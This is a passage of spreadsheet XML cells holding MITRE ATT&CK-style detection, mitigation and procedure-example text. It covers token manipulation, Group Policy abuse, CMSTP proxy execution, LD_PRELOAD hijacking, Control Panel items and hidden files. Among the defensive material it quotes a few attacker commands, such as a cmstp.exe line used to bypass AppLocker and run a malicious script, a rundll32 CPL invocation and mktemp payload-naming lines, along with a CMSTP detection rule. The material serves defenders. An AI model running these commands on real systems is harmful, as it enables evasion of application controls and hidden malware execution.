By requiring a password, even if an adversary can get terminal access, they must know the password to run anything in the sudoers file. Setting the timestamp_timeout to 0 will require the user to input their password every time sudo is executed.
Restrict File and Directory Permissions
The sudoers file should be strictly edited such that passwords are always required and that users can't spawn risky processes as users with higher privilege.
User Account Control
Although UAC bypass techniques exist, it is still prudent to use the highest enforcement level for UAC when possible and mitigate bypass opportunities that exist with techniques such as [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
User Account Management
Limit the privileges of cloud accounts to assume, create, or impersonate additional roles, policies, and permissions to only those required. Where just-in-time access is enabled, consider requiring manual approval for temporary elevation of privileges.
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Modification
Monitor for changes made to AD settings that may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls.
Command Execution
Monitor executed commands and arguments for token manipulation by auditing command-line activity. Specifically, analysts should look for use of the &lt;code&gt;runas&lt;/code&gt; command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
OS API Execution
Monitor for API calls, loaded by a payload, for token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. There are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., &lt;code&gt;LogonUser&lt;/code&gt; (Citation: Microsoft LogonUser), &lt;code&gt;DuplicateTokenEx&lt;/code&gt;(Citation: Microsoft DuplicateTokenEx), and &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.
Process Creation
Monitor for executed processes that may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls.
Process Metadata
Query systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation) Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.
User Account Metadata
Monitor for contextual data about an account, which may include a username, user ID, environmental data, etc. that may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls.
Privileged Account Management
Limit permissions so that users and user groups cannot create tokens. This setting should be defined for the local system account only. GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Create a token object. (Citation: Microsoft Create Token) Also define who can create a process level token to only the local and network service through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Replace a process level token.(Citation: Microsoft Replace Process Token)
Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command &lt;code&gt;runas&lt;/code&gt;.(Citation: Microsoft runas)
User Account Management
An adversary must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require.  
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local `NT AUTHORITY\SYSTEM` privilege escalation.(Citation: Mandiant APT41)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used JuicyPotato to abuse the &lt;code&gt;SeImpersonate&lt;/code&gt; token privilege to escalate from web application pool accounts to NT Authority\SYSTEM.(Citation: RedCanary Mockingbird May 2020)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used has used Metasploit’s named-pipe impersonation technique to escalate privileges.(Citation: FireEye FIN6 Apr 2019)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) can gain system level privilege by passing &lt;code&gt;SeDebugPrivilege&lt;/code&gt; to the &lt;code&gt;AdjustTokenPrivilege&lt;/code&gt; API.(Citation: Malwarebytes Kimsuky June 2021)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) has the ability modify access tokens.(Citation: Microsoft BlackCat Jun 2022)(Citation: Sophos BlackCat Jul 2022)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) has used &lt;code&gt;SeDebugPrivilege&lt;/code&gt; and &lt;code&gt;AdjustTokenPrivileges&lt;/code&gt; to elevate privileges.(Citation: McAfee Cuba April 2021)
Duqu
[Duqu](https://attack.mitre.org/software/S0038) examines running system processes for tokens that have specific system privileges. If it finds one, it will copy the token and store it for later use. Eventually it will start new processes with the stored token attached. It can also steal tokens to acquire administrative privileges.(Citation: Kaspersky Duqu 2.0)
Empire
[Empire](https://attack.mitre.org/software/S0363) can use [PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-TokenManipulation&lt;/code&gt; to manipulate access tokens.(Citation: Github PowerShell Empire)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can use token manipulation to bypass UAC on Windows7 systems.(Citation: ESET Gelsemium June 2021)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) can use `AdjustTokenPrivileges` to grant itself privileges for debugging with `SeDebugPrivilege`, creating backups with `SeBackupPrivilege`, loading drivers with `SeLoadDriverPrivilege`, and shutting down a local system with `SeShutdownPrivilege`.(Citation: Qualys Hermetic Wiper March 2022)(Citation: Crowdstrike DriveSlayer February 2022)
Hydraq
[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can adjust token privileges.(Citation: Symantec Hydraq Jan 2010)
KillDisk
[KillDisk](https://attack.mitre.org/software/S0607) has attempted to get the access token of a process by calling &lt;code&gt;OpenProcessToken&lt;/code&gt;. If [KillDisk](https://attack.mitre.org/software/S0607) gets the access token, then it attempt to modify the token privileges with &lt;code&gt;AdjustTokenPrivileges&lt;/code&gt;.(Citation: Trend Micro KillDisk 2)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can use `AdjustTokenPrivileges()` to elevate privileges.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
MegaCortex
[MegaCortex](https://attack.mitre.org/software/S0576) can enable &lt;code&gt;SeDebugPrivilege&lt;/code&gt; and adjust token privileges.(Citation: IBM MegaCortex)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) can use Invoke-TokenManipulation for manipulating tokens.(Citation: GitHub PoshC2)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-TokenManipulation&lt;/code&gt; Exfiltration module can be used to manipulate tokens.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
Ryuk
[Ryuk](https://attack.mitre.org/software/S0446) has attempted to adjust its token privileges to have the &lt;code&gt;SeDebugPrivilege&lt;/code&gt;.(Citation: CrowdStrike Ryuk January 2019)
SUNSPOT
[SUNSPOT](https://attack.mitre.org/software/S0562) modified its security token to grants itself debugging privileges by adding &lt;code&gt;SeDebugPrivilege&lt;/code&gt;.(Citation: CrowdStrike SUNSPOT Implant January 2021)
Sliver
[Sliver](https://attack.mitre.org/software/S0633) has the ability to manipulate user tokens on targeted Windows systems.(Citation: Bishop Fox Sliver Framework August 2019)(Citation: GitHub Sliver C2)
SslMM
[SslMM](https://attack.mitre.org/software/S0058) contains a feature to manipulate process privileges and tokens.(Citation: Baumgartner Naikon 2015)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Creation
Monitor for newly constructed active directory objects, such as Windows EID 5137.
Active Directory Object Deletion
Monitor for unexpected deletion of an active directory object, such as Windows EID 5141.
Active Directory Object Modification
Monitor for changes made to AD settings for unexpected modifications to user accounts, such as deletions or potentially malicious changes to user attributes (credentials, status, etc.).
Command Execution
Monitor executed commands and arguments that may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain.
Audit
Identify and correct GPO permissions abuse opportunities (ex: GPO modification privileges) using auditing tools such as [BloodHound](https://attack.mitre.org/software/S0521) (version 1.5.1 and later).(Citation: GitHub Bloodhound)
User Account Management
Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.(Citation: Wald0 Guide to GPOs)(Citation: Microsoft WMI Filters)(Citation: Microsoft GPO Security Filtering)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) has used Group Policy Objects to deploy batch scripts.(Citation: Crowdstrike Indrik November 2018)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) can modify the GPO to evade detection.(Citation: Cybereason Egregor Nov 2020) (Citation: Intrinsec Egregor Nov 2020)
Empire
[Empire](https://attack.mitre.org/software/S0363) can use &lt;code&gt;New-GPOImmediateTask&lt;/code&gt; to modify a GPO that will install and execute a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053).(Citation: Github PowerShell Empire)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to deploy through an infected system's default domain policy.(Citation: ESET Hermetic Wizard March 2022)
Meteor
[Meteor](https://attack.mitre.org/software/S0688) can use group policy to push a scheduled task from the AD to all network machines.(Citation: Check Point Meteor Aug 2021)
Prestige
[Prestige](https://attack.mitre.org/software/S1058) has been deployed using the Default Domain Group Policy Object from an Active Directory Domain Controller.(Citation: Microsoft Prestige ransomware October 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may gather information about the victim's hosts that can be used during targeting.
Note: Event ID 4104 (from the Microsoft-Windows-Powershell/Operational log) captures Powershell script blocks, which can be analyzed and used to detect on abuse of CMSTP. 
Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts, such as Sysmon Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.
Process Creation
Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Sysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)
* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe
* Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).
Note: Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The Analytic looks for the creation of a new CMSTP.exe process which initiates a network connection to a non-local IP address. This is a specific implementation where CMSTP.exe can be leveraged to setup listeners that will receive and install malware from remote sources in a trusted fashion.
&lt;h4&gt; Analytic 1 - CMSTP &lt;/h4&gt; 
&lt;code&gt; processes = filter processes where (
  (event_id == "1" OR event_id == "4688") AND 
  exe == "C:\Windows\System32\CMSTP.exe" AND
  src_ip NOT IN ["10.0.0.0/8", "192.168.0.0/16", "172.16.0.0/12"] ) &lt;/code&gt;
Disable or Remove Feature or Program
CMSTP.exe may not be necessary within a given environment (unless using it for VPN connection installation).
Execution Prevention
Consider using application control configured to block execution of CMSTP.exe if it is not required for a given system or network to prevent potential misuse by adversaries.
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has used the command &lt;code&gt;cmstp.exe /s /ns C:\Users\ADMINI~W\AppData\Local\Temp\XKNqbpzl.txt&lt;/code&gt; to bypass AppLocker and launch a malicious script.(Citation: Talos Cobalt Group July 2018)(Citation: Morphisec Cobalt Gang Oct 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used CMSTP.exe and a malicious INF to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload.(Citation: FireEye MuddyWater Mar 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments associated with modifications to variables and files associated with loading shared libraries such as LD_PRELOAD on Linux and DYLD_INSERT_LIBRARIES on macOS.
File Creation
Monitor for newly constructed files that are added to absolute paths of shared libraries such as LD_PRELOAD on Linux and DYLD_INSERT_LIBRARIES on macOS.
File Modification
Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD on Linux and DYLD_INSERT_LIBRARIES on macOS.
Module Load
Monitor library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
Process Creation
Monitor for newly executed processes for unusual activity (e.g., a process that does not use the network begins to do so).
Execution Prevention
Adversaries may use new payloads to execute this technique. Identify and block potentially malicious software executed through hijacking by using application control solutions also capable of blocking libraries loaded by legitimate software.
Operating System Configuration
When System Integrity Protection (SIP) is enabled in macOS, the aforementioned environment variables are ignored when executing protected binaries. Third-party applications can also leverage Apple’s Hardened Runtime, ensuring these environment variables are subject to imposed restrictions.(Citation: Apple Developer Doco Hardened Runtime) Admins can add restrictions to applications by setting the setuid and/or setgid bits, use entitlements, or have a __RESTRICT segment in the Mach-O binary.
APT41
[APT41](https://attack.mitre.org/groups/G0096) has configured payloads to load via LD_PRELOAD.(Citation: Crowdstrike GTR2020 Mar 2020)	
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.(Citation: Anomali Rocke March 2019)	
Ebury
[Ebury](https://attack.mitre.org/software/S0377) has injected its dynamic library into descendent processes of sshd via LD_PRELOAD.(Citation: ESET Ebury Oct 2017)
HiddenWasp
[HiddenWasp](https://attack.mitre.org/software/S0394) adds itself as a shared object to the LD_PRELOAD environment variable.(Citation: Intezer HiddenWasp Map 2019)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has modified /etc/ld.so.preload to intercept shared library import functions.(Citation: Unit 42 Hildegard Malware)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) adds malicious file paths to the &lt;code&gt;DYLD_FRAMEWORK_PATH&lt;/code&gt; and &lt;code&gt;DYLD_LIBRARY_PATH&lt;/code&gt; environment variables to execute malicious code.(Citation: trendmicro xcsset xcode project 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
When executed from the command line or clicked, control.exe will execute the CPL file (ex: &lt;code&gt;control.exe file.cpl&lt;/code&gt;) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: &lt;code&gt;rundll32.exe shell32.dll,Control_RunDLL file.cpl&lt;/code&gt;). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)
File Creation
Monitor for newly constructed files that may forge web cookies that can be used to gain access to web applications or Internet services.
Module Load
Monitor for DLL/PE file events, such as the &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;ControlRunDLLAsUser&lt;/code&gt; API functions in shell32.dll.
OS API Execution
Monitor for API calls that may forge web cookies that can be used to gain access to web applications or Internet services.
Process Creation
Monitor and analyze activity related to items associated with CPL files, such as the control.exe. Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)
Windows Registry Key Modification
Inventory Control Panel items to locate unregistered and potentially malicious files present on systems:
* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace&lt;/code&gt; and &lt;code&gt;HKEY_CLASSES_ROOT\CLSID\{GUID}&lt;/code&gt;. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)
* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the &lt;code&gt;CPLs&lt;/code&gt; and &lt;code&gt;Extended Properties&lt;/code&gt; Registry keys of &lt;code&gt;HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Control Panel&lt;/code&gt;. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically (&lt;code&gt; WinExec("c:\windows\system32\control.exe {Canonical_Name}", SW_NORMAL);&lt;/code&gt;) or from a command line (&lt;code&gt;control.exe /name {Canonical_Name}&lt;/code&gt;).(Citation: Microsoft Implementing CPL)
* Some Control Panel items are extensible via Shell extensions registered in &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers&lt;/code&gt; where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)
Execution Prevention
Identify and block potentially malicious and unknown .cpl files by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)
Restrict File and Directory Permissions
Restrict storage and execution of Control Panel items to protected directories, such as &lt;code&gt;C:\Windows&lt;/code&gt;, rather than user directories.
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) has used control panel files (CPL), delivered via e-mail, for execution.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can register itself for execution and persistence via the Control Panel.(Citation: ESET InvisiMole June 2020)
Reaver
[Reaver](https://attack.mitre.org/software/S0172) drops and executes a malicious CPL file as its payload.(Citation: Palo Alto Reaver Nov 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Instance Creation
Monitor system logs to review instance activities occurring across all cloud environments and regions.
Instance Metadata
Monitor and consider configuring alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.
Software Configuration
Cloud service providers may allow customers to deactivate unused regions.(Citation: CloudSploit - Unused AWS Regions)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may attempt to hide artifacts associated with their behaviors to evade detection. 
Command Execution
Monitor executed commands and arguments that may attempt to hide artifacts associated with their behaviors to evade detection.
File Creation
Monitor for newly constructed files that may attempt to hide artifacts associated with their behaviors to evade detection.
File Metadata
Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions that may attempt to hide artifacts associated with their behaviors to evade detection.
File Modification
Monitor for changes made to files that may attempt to hide artifacts associated with their behaviors to evade detection.
Firmware Modification
Monitor for changes made to firewall rules for unexpected modifications to allow/block specific network traffic that may attempt to hide artifacts associated with their behaviors to evade detection.
OS API Execution
Monitor for API calls that may attempt to hide artifacts associated with their behaviors to evade detection.
Process Creation
Monitor newly executed processes that may attempt to hide artifacts associated with their behaviors to evade detection.
Script Execution
Monitor for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Service Creation
Monitor for newly constructed services/daemons that may attempt to hide artifacts associated with their behaviors to evade detection.
User Account Creation
Monitor for newly constructed user accounts that may attempt to hide artifacts associated with their behaviors to evade detection.
User Account Metadata
Monitor for contextual data about an account, which may include a username, user ID, environmental data that may attempt to hide artifacts associated with their behaviors to evade detection.
Windows Registry Key Modification
Monitor for changes made to windows registry keys and/or values that may attempt to hide artifacts associated with their behaviors to evade detection.
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) uses the &lt;code&gt;mktemp&lt;/code&gt; utility to make unique file and directory names for payloads, such as &lt;code&gt;TMP_DIR=`mktemp -d -t x&lt;/code&gt;.(Citation: 20 macOS Common Tools and Techniques)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) has used `%HiddenReg%` and `%HiddenKey%` as part of its persistence via the Windows registry.(Citation: Secureworks DarkTortilla Aug 2022)
OSX/Shlayer
[OSX/Shlayer](https://attack.mitre.org/software/S0402) has used the &lt;code&gt;mktemp&lt;/code&gt; utility to make random and unique filenames for payloads, such as &lt;code&gt;export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"&lt;/code&gt; or &lt;code&gt;mktemp -t Installer&lt;/code&gt;.(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)(Citation: Shlayer jamf gatekeeper bypass 2021)
Tarrask
[Tarrask](https://attack.mitre.org/software/S1011) is able to create “hidden” scheduled tasks by deleting the Security Descriptor (`SD`) registry value.(Citation: Tarrask scheduled task)
WarzoneRAT
[WarzoneRAT](https://attack.mitre.org/software/S0670) can masquerade the Process Environment Block on a compromised host to hide it's attempts to elevate privileges through `IFileOperation`.(Citation: Check Point Warzone Feb 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may use email rules to hide inbound emails in a compromised user's mailbox. Monitor email clients and applications for suspicious activity, such as missing messages or abnormal configuration and/or log entries. In environments using Exchange, monitor logs for the creation or modification of mail transport rules.
Command Execution
On Windows and Exchange systems, monitor for creation or modification of suspicious inbox rules through the use of the `New-InboxRule`, `Set-InboxRule`, `New-TransportRule`, and `Set-TransportRule` PowerShell cmdlets.(Citation: Microsoft BEC Campaign)(Citation: Microsoft Manage Mail Flow Rules 2023)(Citation: Mandiant Cloudy Logs 2023)
File Modification
On MacOS systems, monitor for modifications to the &lt;code&gt;RulesActiveState.plist&lt;/code&gt;, &lt;code&gt;SyncedRules.plist&lt;/code&gt;, &lt;code&gt;UnsyncedRules.plist&lt;/code&gt;, and &lt;code&gt;MessageRules.plist&lt;/code&gt; files.(Citation: MacOS Email Rules)
Audit
Enterprise email solutions may have monitoring mechanisms that may include the ability to audit inbox rules on a regular basis. 
In an Exchange environment, Administrators can use `Get-InboxRule` / `Remove-InboxRule` and `Get-TransportRule` / `Remove-TransportRule` to discover and remove potentially malicious inbox and transport rules.(Citation: Microsoft Get-InboxRule)(Citation: Microsoft Manage Mail Flow Rules 2023)
FIN4
[FIN4](https://attack.mitre.org/groups/G0085) has created rules in victims' Microsoft Outlook accounts to automatically delete emails containing words such as “hacked," "phish," and “malware" in a likely attempt to prevent organizations from communicating about their activities.(Citation: FireEye Hacking FIN4 Dec 2014)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Modification
Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded.
Firmware Modification
Monitor for changes made to firmware for unexpected modifications to settings and/or data that may use a hidden file system to conceal malicious activity from users and security tools. [Bootkit](https://attack.mitre.org/techniques/T1542/003)
Windows Registry Key Modification
Monitor for changes made to windows registry keys and/or values that may use a hidden file system to conceal malicious activity from users and security tools.
Equation
[Equation](https://attack.mitre.org/groups/G0020) has used an encrypted virtual file system stored in the Windows Registry.(Citation: Kaspersky Equation QA)
Strider
[Strider](https://attack.mitre.org/groups/G0041) has used a hidden file system that is stored as a file on disk.(Citation: Kaspersky ProjectSauron Full Report)
BOOTRASH
[BOOTRASH](https://attack.mitre.org/software/S0114) has used unallocated disk space between partitions for a hidden file system that stores components of the Nemesis bootkit.(Citation: FireEye Bootkits)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) has used a portable FAT16 partition image placed in %TEMP% as a hidden file system.(Citation: ESET ComRAT May 2020)
Regin
[Regin](https://attack.mitre.org/software/S0019) has used a hidden file system to store some of its components.(Citation: Kaspersky Regin)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) can use concealed storage mechanisms including an NTFS or FAT-16 filesystem encrypted with CAST-128 in CBC mode.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor the file system and shell commands for files being created with a leading ".” and the Windows command-line use of attrib.exe to add the hidden attribute.
File Creation
Monitor the file system and shell commands for files being created with a leading ".”
File Metadata
Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions may set files and directories to be hidden to evade detection mechanisms.
Process Creation
Monitor newly executed processes that may set files and directories to be hidden to evade detection mechanisms.
APT28
[APT28](https://attack.mitre.org/groups/G0007) has saved files with hidden file attributes.(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)
APT32
[APT32](https://attack.mitre.org/groups/G0050)'s macOS backdoor hides the clientID file via a chflags function.(Citation: ESET OceanLotus macOS April 2019)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has created hidden files and folders within a compromised Linux system `/tmp` directory. [FIN13](https://attack.mitre.org/groups/G1016) also has used `attrib.exe` to hide gathered local host information.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has hidden files on a compromised host.(Citation: Rapid7 HAFNIUM Mar 2021)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used a VBA Macro to set its file attributes to System and Hidden and has named files with a dot prefix to hide them from the Finder application.(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)(Citation: Lazarus APT January 2022)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has used malware to store malicious binaries in hidden directories on victim's USB drives.(Citation: Kaspersky LuminousMoth July 2021)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129)'s [PlugX](https://attack.mitre.org/software/S0013) variant has created a hidden folder on USB drives named &lt;code&gt;RECYCLE.BIN&lt;/code&gt; to store malicious executables and collected data.(Citation: Avira Mustang Panda January 2020)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) downloaded a file "libprocesshider", which could hide files on the target system.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)
Transparent Tribe
[Transparent Tribe](https://attack.mitre.org/groups/G0134) can hide legitimate directories and replace them with malicious copies of the same name.(Citation: Kaspersky Transparent Tribe August 2020)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has created a hidden directory under &lt;code&gt;C:\ProgramData\Apple\Updates\&lt;/code&gt; and &lt;code&gt;C:\Users\Public\Documents\Flash\&lt;/code&gt;.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) has created hidden folders.(Citation: SentinelLabs Agent Tesla Aug 2020)
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584) has added a leading &lt;code&gt;.&lt;/code&gt; to plist filenames, unlisting them from the Finder app and default Terminal directory listings.(Citation: CISA AppleJeus Feb 2021)
Attor
[Attor](https://attack.mitre.org/software/S0438) can set attributes of log files and directories to HIDDEN, SYSTEM, ARCHIVE, or a combination of those.(Citation: ESET Attor Oct 2019)
BackConfig
[BackConfig](https://attack.mitre.org/software/S0475) has the ability to set folders or files to be hidden from the Windows Explorer default view.(Citation: Unit 42 BackConfig May 2020)
Calisto
[Calisto](https://attack.mitre.org/software/S0274) uses a hidden directory named .calisto to store data from the victim’s machine before exfiltration.(Citation: Securelist Calisto July 2018)(Citation: Symantec Calisto July 2018)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has created a hidden file in the Startup folder of the current user.(Citation: Trusteer Carberp October 2010)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) has the ability to set its file attributes to hidden.(Citation: Trend Micro DRBControl February 2020)
CoinTicker
[CoinTicker](https://attack.mitre.org/software/S0369) downloads the following hidden files to evade detection and maintain persistence: /private/tmp/.info.enc, /private/tmp/.info.py, /private/tmp/.server.sh, ~/Library/LaunchAgents/.espl.plist, ~/Library/Containers/.[random string]/[random string].(Citation: CoinTicker 2019)
Dacls
[Dacls](https://attack.mitre.org/software/S0497) has had its payload named with a dot prefix to make it hidden from view in the Finder application.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)
EnvyScout
[EnvyScout](https://attack.mitre.org/software/S0634) can use hidden directories and files to hide malicious executables.(Citation: MSTIC Nobelium Toolset May 2021)
Explosive
[Explosive](https://attack.mitre.org/software/S0569) has commonly set file and path attributes to hidden.(Citation: CheckPoint Volatile Cedar March 2015)
FruitFly
[FruitFly](https://attack.mitre.org/software/S0277) saves itself with a leading "." to make it a hidden file.(Citation: objsee mac malware 2017)
Imminent Monitor
[Imminent Monitor](https://attack.mitre.org/software/S0434) has a dynamic debugging feature to set the file attribute to hidden.(Citation: QiAnXin APT-C-36 Feb2019)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can create hidden system directories.(Citation: ESET InvisiMole June 2020)
Ixeshe
[Ixeshe](https://attack.mitre.org/software/S0015) sets its own executable file's attributes to hidden.(Citation: Trend Micro IXESHE 2012)
Komplex
The [Komplex](https://attack.mitre.org/software/S0162) payload is stored in a hidden directory at &lt;code&gt;/Users/Shared/.local/kextd&lt;/code&gt;.(Citation: Sofacy Komplex Trojan)
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) has the ability to copy itself to a hidden file and directory.(Citation: Infoblox Lokibot January 2019)
LoudMiner
[LoudMiner](https://attack.mitre.org/software/S0451) has set the attributes of the VirtualBox directory and VBoxVmService parent directory to "hidden".(Citation: ESET LoudMiner June 2019)
MacSpy
[MacSpy](https://attack.mitre.org/software/S0282) stores itself in &lt;code&gt;~/Library/.DS_Stores/&lt;/code&gt; (Citation: alientvault macspy)
Machete
[Machete](https://attack.mitre.org/software/S0409) has the capability to exfiltrate stolen data to a hidden folder on a removable drive.(Citation: ESET Machete July 2019)
Micropsia
[Micropsia](https://attack.mitre.org/software/S0339) creates a new hidden directory to store all components' outputs in a dedicated sub-folder for each.(Citation: Radware Micropsia July 2018)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can copy itself to and launch itself from hidden folders.(Citation: Red Canary NETWIRE January 2020)
OSX/Shlayer
